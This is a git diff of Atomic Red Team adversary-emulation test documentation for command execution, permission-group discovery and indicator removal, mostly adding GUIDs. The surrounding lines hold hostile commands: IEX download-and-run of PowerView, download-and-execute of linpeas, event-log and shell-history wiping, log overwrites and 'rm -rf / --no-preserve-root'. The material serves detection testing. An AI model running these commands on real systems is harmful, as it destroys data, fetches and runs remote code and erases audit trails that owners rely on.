## Atomic Test #1 - AppleScript + +auto_generated_guid: 3600d97d-81b9-4171-ab96-e4386506e2c2 + Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit. You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request. Reference: https://github.com/EmpireProject/Empire - **Supported Platforms:** macOS diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index a682a7b9..920ce645 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -16,15 +16,17 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
## Atomic Test #1 - Create and Execute Batch Script -Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. +auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388 + +Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Command to execute within script. | string | dir| | script_path | Script path. | path | $env:TEMP\T1059.003_script.bat| @@ -48,7 +50,7 @@ Remove-Item #{script_path} -Force -ErrorAction Ignore ##### Description: Batch file must exist on disk at specified location (#{script_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{script_path}) {exit 0} else {exit 1} +if (Test-Path #{script_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -63,15 +65,17 @@ Set-Content -Path #{script_path} -Value "#{command_to_execute}"
## Atomic Test #2 - Writes text to a file and displays it. -Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. +auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e + +Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_contents_path | Path to the file that the command prompt will drop. | path | %TEMP%\test.bin| | message | Message that will be written to disk and then displayed. | string | Hello from the Windows Command Prompt!| diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md index 1b5be0f8..db220177 100644 --- a/atomics/T1059.004/T1059.004.md +++ b/atomics/T1059.004/T1059.004.md @@ -16,15 +16,17 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
## Atomic Test #1 - Create and Execute Bash Shell Script -Creates and executes a simple bash script. +auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 + +Creates and executes a simple bash script. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_path | Script path | path | /tmp/art.sh| @@ -52,10 +54,12 @@ rm #{script_path}
## Atomic Test #2 - Command-Line Interface + +auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c + Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. - **Supported Platforms:** macOS, Linux diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index 42e8cd66..e78a44ae 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -18,17 +18,19 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
## Atomic Test #1 - Visual Basic script execution to gather local computer information + +auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9 + Visual Basic execution test, execute vbscript via PowerShell. When successful, system information will be written to $env:TEMP\T1059.005.out.txt. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | vbscript | Path to sample script | String | PathToAtomicsFolder\T1059.005\src\sys_info.vbs| @@ -52,7 +54,7 @@ Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore ##### Description: Sample script must exist on disk at specified location (#{vbscript}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{vbscript}) {exit 0} else {exit 1} +if (Test-Path #{vbscript}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -68,12 +70,14 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
## Atomic Test #2 - Encoded VBS code execution + +auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa + This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying "ART T1059.005" A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required. You can validate this by opening WinWord -> File -> Account -> About Word - **Supported Platforms:** Windows @@ -105,7 +109,7 @@ try { $path = $wdApp.Path Stop-Process -Name "winword" if ($path.contains("(x86)")) { exit 1 } else { exit 0 } -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -119,17 +123,19 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #3 - Extract Memory via VBA + +auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 + This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word | String | Word| @@ -159,7 +165,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md index 01f280d0..216ee5fb 100644 --- a/atomics/T1059.006/T1059.006.md +++ b/atomics/T1059.006/T1059.006.md @@ -16,15 +16,17 @@ Python comes with many built-in packages to interact with the underlying system,
## Atomic Test #1 - Execute shell script via python's command mode arguement -Download and execute shell script and write to file then execute locally using Python -c (command mode) +auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb + +Download and execute shell script and write to file then execute locally using Python -c (command mode) **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh| | payload_file_name | Name of shell script downloaded from the script_url | String | T1059.006-payload| @@ -51,7 +53,7 @@ rm #{payload_file_name} ##### Check Prereq Commands: ```sh which_python=`which python`; python -V -$which_python -c 'import requests' 2>/dev/null; echo $? +$which_python -c 'import requests' 2>/dev/null; echo $? ``` ##### Get Prereq Commands: ```sh @@ -65,15 +67,17 @@ pip install requests
## Atomic Test #2 - Execute Python via scripts (Linux) -Create Python file (.py) that downloads and executes shell script via executor arguments +auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 + +Create Python file (.py) that downloads and executes shell script via executor arguments **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | python_script_name | Python script name | Path | T1059.006.py| | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh| @@ -111,7 +115,7 @@ rm #{python_script_name} #{payload_file_name} ##### Check Prereq Commands: ```sh which_python=`which python`; python -V -$which_python -c 'import requests' 2>/dev/null; echo $? +$which_python -c 'import requests' 2>/dev/null; echo $? ``` ##### Get Prereq Commands: ```sh @@ -125,15 +129,17 @@ pip install requests
## Atomic Test #3 - Execute Python via Python executables (Linux) -Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments +auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa + +Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | python_script_name | Name of Python script name | Path | T1059.006.py| | script_url | URL hosting external malicious payload | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh| @@ -173,7 +179,7 @@ rm #{python_binary_name} #{python_script_name} #{payload_file_name} ##### Check Prereq Commands: ```sh which_python=`which python`; python -V -$which_python -c 'import requests' 2>/dev/null; echo $? +$which_python -c 'import requests' 2>/dev/null; echo $? ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1069.001/T1069.001.md b/atomics/T1069.001/T1069.001.md index 55a48f28..05acf215 100644 --- a/atomics/T1069.001/T1069.001.md +++ b/atomics/T1069.001/T1069.001.md @@ -16,8 +16,10 @@ Commands such as net localgroup of the [Net](https://attack.mitre.o
## Atomic Test #1 - Permission Groups Discovery (Local) -Permission Groups Discovery +auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae + +Permission Groups Discovery **Supported Platforms:** macOS, Linux @@ -42,9 +44,11 @@ if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from
## Atomic Test #2 - Basic Permission Groups Discovery Windows (Local) + +auto_generated_guid: 1f454dd6-e134-44df-bebb-67de70fb6cd8 + Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows @@ -68,9 +72,11 @@ net localgroup "Administrators"
## Atomic Test #3 - Permission Groups Discovery PowerShell (Local) + +auto_generated_guid: a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 + Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 47d17a9b..228f6b73 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -26,9 +26,11 @@ Commands such as net group /domain of the [Net](https://attack.mitr
## Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain) + +auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d + Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows @@ -54,16 +56,18 @@ net group "enterprise admins" /domain
## Atomic Test #2 - Permission Groups Discovery PowerShell (Domain) + +auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 + Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user | User to identify what groups a user is a member of | string | administrator| @@ -84,9 +88,11 @@ get-ADPrincipalGroupMembership #{user} | select name
## Atomic Test #3 - Elevated group enumeration using net group (Domain) + +auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 + Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows @@ -112,8 +118,10 @@ net group "BUILTIN\Backup Operators" /doma
## Atomic Test #4 - Find machines where user has local admin access (PowerView) -Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed. +auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1 + +Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed. **Supported Platforms:** Windows @@ -137,8 +145,10 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #5 - Find local admins on all machines in domain (PowerView) -Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed. +auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd + +Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed. **Supported Platforms:** Windows @@ -162,15 +172,17 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #6 - Find Local Admins via Group Policy (PowerView) -takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. +auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a + +takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME| @@ -192,8 +204,10 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast) -When successful, accounts that do not require kerberos pre-auth will be returned +auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b + +When successful, accounts that do not require kerberos pre-auth will be returned **Supported Platforms:** Windows @@ -214,7 +228,7 @@ get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq ##### Description: Computer must be domain joined. ##### Check Prereq Commands: ```powershell -if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -223,7 +237,7 @@ Write-Host Joining this computer to a domain must be done manually. ##### Description: Requires the Active Directory module for powershell to be installed. ##### Check Prereq Commands: ```powershell -if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} +if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -237,16 +251,18 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
## Atomic Test #8 - Adfind - Query Active Directory Groups + +auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -265,7 +281,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index b1f7c663..81e61b56 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -22,15 +22,17 @@ These logs may also be cleared through other mechanisms, such as the event viewe
## Atomic Test #1 - Clear Logs -Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. +auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967 + +Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | log_name | Windows Log Name, ex System | String | System| @@ -51,10 +53,12 @@ wevtutil cl #{log_name}
## Atomic Test #2 - Delete System Logs Using Clear-EventLog + +auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498 + Clear event logs using built-in PowerShell commands. Upon successful execution, you should see the list of deleted event logs Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it. - **Supported Platforms:** Windows @@ -79,10 +83,12 @@ Get-EventLog -list
## Atomic Test #3 - Clear Event Logs via VBA + +auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e + This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error - **Supported Platforms:** Windows @@ -109,7 +115,7 @@ try { New-Object -COMObject "Word.Application" | Out-Null Stop-Process -Name "winword" exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md index 9600f758..2715a141 100644 --- a/atomics/T1070.002/T1070.002.md +++ b/atomics/T1070.002/T1070.002.md @@ -23,8 +23,10 @@
## Atomic Test #1 - rm -rf -Delete system and audit logs +auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 + +Delete system and audit logs **Supported Platforms:** macOS, Linux @@ -48,15 +50,17 @@ sudo rm -rf /private/var/audit/*
## Atomic Test #2 - Overwrite Linux Mail Spool -This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. +auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4 + +This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of mail spool | String | root| @@ -77,15 +81,17 @@ echo 0> /var/spool/mail/#{username}
## Atomic Test #3 - Overwrite Linux Log -This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. +auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 + +This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | log_path | Path of specified log | Path | /var/log/secure| diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md index f2aa13b5..4152771e 100644 --- a/atomics/T1070.003/T1070.003.md +++ b/atomics/T1070.003/T1070.003.md @@ -40,8 +40,10 @@ Adversaries may run the PowerShell command Clear-History to flush t
## Atomic Test #1 - Clear Bash history (rm) -Clears bash history via rm +auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc + +Clears bash history via rm **Supported Platforms:** Linux, macOS @@ -64,8 +66,10 @@ rm ~/.bash_history
## Atomic Test #2 - Clear Bash history (echo) -Clears bash history via rm +auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 + +Clears bash history via rm **Supported Platforms:** Linux @@ -88,8 +92,10 @@ echo "" > ~/.bash_history
## Atomic Test #3 - Clear Bash history (cat dev/null) -Clears bash history via cat /dev/null +auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f + +Clears bash history via cat /dev/null **Supported Platforms:** Linux, macOS @@ -112,8 +118,10 @@ cat /dev/null > ~/.bash_history
## Atomic Test #4 - Clear Bash history (ln dev/null) -Clears bash history via a symlink to /dev/null +auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 + +Clears bash history via a symlink to /dev/null **Supported Platforms:** Linux, macOS @@ -136,8 +144,10 @@ ln -sf /dev/null ~/.bash_history
## Atomic Test #5 - Clear Bash history (truncate) -Clears bash history via truncate +auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 + +Clears bash history via truncate **Supported Platforms:** Linux @@ -160,8 +170,10 @@ truncate -s0 ~/.bash_history
## Atomic Test #6 - Clear history of a bunch of shells -Clears the history of a bunch of different shell types by setting the history size to zero +auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c + +Clears the history of a bunch of different shell types by setting the history size to zero **Supported Platforms:** Linux, macOS @@ -186,8 +198,10 @@ history -c
## Atomic Test #7 - Clear and Disable Bash History Logging -Clears the history and disable bash history logging of the current shell and future shell sessions +auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 + +Clears the history and disable bash history logging of the current shell and future shell sessions **Supported Platforms:** Linux, macOS @@ -219,8 +233,10 @@ set -o history
## Atomic Test #8 - Use Space Before Command to Avoid Logging to History -Using a space before a command causes the command to not be logged in the Bash History file +auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6 + +Using a space before a command causes the command to not be logged in the Bash History file **Supported Platforms:** Linux, macOS @@ -244,8 +260,10 @@ whoami
## Atomic Test #9 - Disable Bash History Logging with SSH -T -Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog +auto_generated_guid: 5f8abd62-f615-43c5-b6be-f780f25790a1 + +Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog **Supported Platforms:** Linux @@ -271,7 +289,7 @@ userdel -f testuser1 ##### Check Prereq Commands: ```sh /usr/sbin/useradd testuser1 -echo pwd101! | passwd testuser1 --stdin +echo pwd101! | passwd testuser1 --stdin ``` ##### Get Prereq Commands: ```sh @@ -286,8 +304,10 @@ yum -y install sshpass
## Atomic Test #10 - Prevent Powershell History Logging -Prevents Powershell history +auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 + +Prevents Powershell history **Supported Platforms:** Windows @@ -314,8 +334,10 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
## Atomic Test #11 - Clear Powershell History by Deleting History File -Clears Powershell history +auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 + +Clears Powershell history **Supported Platforms:** Windows diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md index 9552d0c2..783f63dc 100644 --- a/atomics/T1070.004/T1070.004.md +++ b/atomics/T1070.004/T1070.004.md @@ -30,15 +30,17 @@ There are tools available from the host operating system to perform cleanup, but
## Atomic Test #1 - Delete a single file - Linux/macOS -Delete a single file from the temporary directory +auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 + +Delete a single file from the temporary directory **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | Path of file to delete | Path | /tmp/victim-files/a| @@ -59,15 +61,17 @@ rm -f #{file_to_delete}
## Atomic Test #2 - Delete an entire folder - Linux/macOS -Recursively delete the temporary directory and all files contained within it +auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e + +Recursively delete the temporary directory and all files contained within it **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Path of folder to delete | Path | /tmp/victim-files| @@ -88,15 +92,17 @@ rm -rf #{folder_to_delete}
## Atomic Test #3 - Overwrite and delete a file with shred -Use the `shred` command to overwrite the temporary file and then delete it +auto_generated_guid: 039b4b10-2900-404b-b67f-4b6d49aa6499 + +Use the `shred` command to overwrite the temporary file and then delete it **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt| @@ -117,16 +123,18 @@ shred -u #{file_to_shred}
## Atomic Test #4 - Delete a single file - Windows cmd + +auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 + Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1551.004| @@ -145,7 +153,7 @@ del /f #{file_to_delete} ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete}) ##### Check Prereq Commands: ```cmd -IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -159,16 +167,18 @@ echo deleteme_T1551.004 >> #{file_to_delete}
## Atomic Test #5 - Delete an entire folder - Windows cmd + +auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 + Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1551.004| @@ -187,7 +197,7 @@ rmdir /s /q #{folder_to_delete} ##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete}) ##### Check Prereq Commands: ```cmd -IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -201,15 +211,17 @@ mkdir #{folder_to_delete}
## Atomic Test #6 - Delete a single file - Windows PowerShell -Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. +auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 + +Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_T1551.004| @@ -228,7 +240,7 @@ Remove-Item -path #{file_to_delete} ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} +if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -242,15 +254,17 @@ New-Item -Path #{file_to_delete} | Out-Null
## Atomic Test #7 - Delete an entire folder - Windows PowerShell -Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. +auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 + +Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_folder_T1551.004| @@ -269,7 +283,7 @@ Remove-Item -Path #{folder_to_delete} -Recurse ##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} +if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -283,8 +297,10 @@ New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
## Atomic Test #8 - Delete Filesystem - Linux -This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. +auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 + +This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. **Supported Platforms:** Linux @@ -307,9 +323,11 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
## Atomic Test #9 - Delete Prefetch File + +auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb + Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" before and after the test to verify that the number of prefetch files decreases by 1. - **Supported Platforms:** Windows @@ -332,19 +350,21 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
## Atomic Test #10 - Delete TeamViewer Log Files + +auto_generated_guid: 69f50a5f-967c-4327-a5bb-e1a9a9983785 + Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. https://twitter.com/SBousseaden/status/1197524463304290305?s=20 - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\TeamViewer_54.log| @@ -363,7 +383,7 @@ Remove-Item #{teamviewer_log_file} ##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} +if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1070.005/T1070.005.md 